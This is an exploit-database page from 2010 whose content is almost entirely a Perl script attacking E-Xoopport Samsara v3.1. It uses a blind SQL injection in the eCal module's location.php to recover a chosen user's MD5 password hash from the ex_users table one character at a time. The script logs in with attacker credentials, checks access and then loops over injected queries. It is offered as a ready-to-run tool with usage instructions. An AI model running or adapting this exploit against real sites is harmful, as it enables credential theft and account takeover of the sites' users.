[webapps / 0day] - E-Xoopport - Samsara <= v3.1 (eCal mod
Posted on 25 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>E-Xoopport - Samsara <= v3.1 (eCal module) Blind SQL Injection Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 25 Sep 2010 | Exploit category: webapps / 0day | Exploit author: _mRkZ_ | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================================== E-Xoopport - Samsara <= v3.1 (eCal module) Blind SQL Injection Exploit ====================================================================== #!/usr/bin/perl # [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit # Author/s: _mRkZ_, WaRWolFz Crew # Created: 2010.09.12 after 0 days the bug was discovered. # Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew # Web Site: www.warwolfz.org use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; $^O eq 'MSWin32' ? system('cls') : system('clear'); print " E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport | | Affected versions: 3.1 | | Bug: Remote Blind SQL Injection (eCal module) | | Author/s: _mRkZ_, WaRWolFz Crew | | Greetz: Dante90, Shaddy, StutM, WarWolFz Crew | | Web Site: www.warwolfz.org | +---------------------------------------------------+ | Warn: You must be able to access to 'eCal' Module | +---------------------------------------------------+ "; if (@ARGV != 4) { print " Usage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack> "; exit; } my $host = $ARGV[0]; my $usr = $ARGV[1]; my $pwd = $ARGV[2]; my $anickde = $ARGV[3]; my $anick = '0x'.EncHex($anickde); print "[!] Logging In... "; my %postdata = ( uname => "$usr", pass => "$pwd", op => "login" ); my $cookies = HTTP::Cookies->new( autosave => 1, ); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); $ua->cookie_jar($cookies); my $req = (POST $host."/user.php", \%postdata); my $request = $ua->request($req); my $content = $request->content; if ($content =~ /<h4>Benvenuto su/i) { print "[+] Logged in! "; } else { print "[-] Fatal Error: username/password incorrect? "; exit; } print "[!] Checking permissions... "; $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); $req = $host."/modules/eCal/location.php?lid=1+AND+1=1"; $ua->cookie_jar($cookies); $request = $ua->get($req); $content = $request->content; if ($content !~ /<b>Eventi nella località : </b>/ig) { print "[+] Fatal Error: Access denied "; exit; } else { print "[+] You have permissions "; } print "[!] Exploiting... "; my $i = 1; my $pwdchr; while ($i != 33) { my $wn = 47; while (1) { $wn++; my $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn"; $ua->cookie_jar($cookies); my $request = $ua->get($req); my $content = $request->content; open LOGZZ, '>lol.html'; print LOGZZ $content; close LOGZZ; if ($content !~ /<b>Eventi nella località : </b><a href='localleve.php?lid='>/ig) { my $cnt = $1; $pwdchr .= chr($wn); $^O eq 'MSWin32' ? system('cls') : system('clear'); PrintChars($anickde, $pwdchr); last; } } $i++; } print " [!] Exploiting completed! "; print "Visit: www.warwolfz.org "; sub PrintChars { my $anick1 = $_[0]; my $chars = $_[1]; print " E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport | | Affected versions: 3.1 | | Bug: Remote Blind SQL Injection (eCal module) | | Author/s: _mRkZ_, WaRWolFz Crew | | Greetz: Dante90, Shaddy, StutM, WarWolFz Crew | | Web Site: www.warwolfz.org | +---------------------------------------------------+ | Warn: You must be able to access to 'eCal' Module | +---------------------------------------------------+ [!] Logging In... [+] Logged in! [!] Checking permissions... [+] You have permissions [!] Exploiting... [+] ".$anick1."'s md5 Password: ".$chars." "; } sub EncHex { my $char = $_[0]; chomp $char; my @trans = unpack("H*", "$char"); return $trans[0]; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-25]</pre></body></html>
